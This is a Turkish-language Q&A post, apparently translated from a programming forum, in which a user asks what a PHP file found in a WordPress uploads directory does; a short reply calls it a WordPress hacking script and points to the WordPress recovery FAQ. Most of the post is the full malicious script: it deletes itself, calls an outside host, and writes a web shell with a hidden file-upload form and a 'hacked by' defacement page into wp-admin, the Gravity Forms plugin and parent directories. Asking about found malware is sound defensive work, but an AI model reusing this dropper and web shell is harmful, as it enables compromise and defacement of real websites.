-3
birisi aşağıdaki php kodu ne bana açıklayabilir:Birisi bana bu php kodunun ne yaptığını açıklayabilir mi?
<?php
@define('SELF_PATH', __FILE__);
unlink(__FILE__);
error_reporting(0);
function RandomString($length = 7) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$randomS = '';
for ($i = 0; $i < $length; $i++) {
$randomS .= $characters[rand(0, strlen($characters) - 1)];
}
return $randomS;
}
$ndom = RandomString();
$fileh = "NG689Skw";
$filev = "../plugins/gravityforms/includes/upload.php";
$sh= file_get_contents("http://update.creditcard/patch/gravity_upload.txt");
$file = '<?php if(isset($_GET["'.$ndom.'"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<br><font color=#FFFFFF>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>'."\r\n";
$file .= '<title>hacked by NG689Skw</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - NG689Skw<br>ng689skw[at]yahoo[dot]com<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}';
$r=fopen("../I.php", "w");fwrite($r,$file);fclose($r);
$r=fopen("../../I.php", "w");fwrite($r,$file);fclose($r);
$r=fopen("../../../I.php", "w");fwrite($r,$file);fclose($r);
$r=fopen("../../../../I.php", "w");fwrite($r,$file);fclose($r);
$r=fopen("../../wp-admin/I.php", "w");fwrite($r,$file);fclose($r);
$r=fopen($filev, "w");fwrite($r,$file);fclose($r);
echo "Randomnya:".$ndom;
?>
Kaynak: http://www.nhrr.org.uk/wordpress/wp-content/uploads/_input_3_.php Textfile
Ne yaptığından emin değilim, ancak Wordpress sitelerini kesmek için kullanılan bir betik. Etkilendiyseniz https://codex.wordpress.org/FAQ_My_site_was_hacked sayfasına bakın. –